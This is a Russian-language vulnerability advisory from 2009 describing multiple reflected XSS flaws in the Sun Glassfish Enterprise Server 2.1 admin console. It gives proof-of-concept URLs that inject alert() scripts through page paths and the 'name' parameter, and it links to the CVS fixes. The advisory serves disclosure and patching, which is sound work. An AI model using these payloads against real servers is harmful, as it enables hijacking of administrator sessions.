DSECRG-09-034

Вендор

Glassfish

Продукт

Sun Glassfish Enterprise Server 2.1

Тип уязвимости

Множественный межсайтовый скриптинг

Reported

19.03.2009

Date of Public Advisory

05.05.2009

Детальное описание

Используя данные уязвимости, злоумышленник может перехватить cookie администратора и выполнить различные действия от его имени. 

1. Множественный межсайтовый скриптинг
*************************************************
Многие страницы подвержены типовой XSS уязвимости. 
Злоумышленник может внедрить скрипт в строку URL. 

Пример
*********
http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!-- 
http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS");</script><!-- 
http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");</script><!-- 
http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</script><!-- 
http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</script><!-- 
http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS");</script><!-- 

Ответный HTML код: 
------------------ 
################################################# 
... 
<script type="text/javascript"> 
var myonload = new Object(); 
myonload.oldonload = window.onload; 
myonload.newonload = function() { 
if ('/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--' != '') { 
... 
################################################# 

2. Множественный межсайтовый скриптинг в GET параметре "name"
*****************************************************************************
Многие страницы подвержены типовой XSS уязвимости в GET параметре "name". 
Злоумышленник может внедрить скрипт в строку URL. 

Пример
*********
http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')> 
http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config 
http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')> 

Решение 
**********
Уязвимости исправлены в CVS. 
Ссылки на изменения, устраняющие уязвимости: 
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29669 
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668  
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668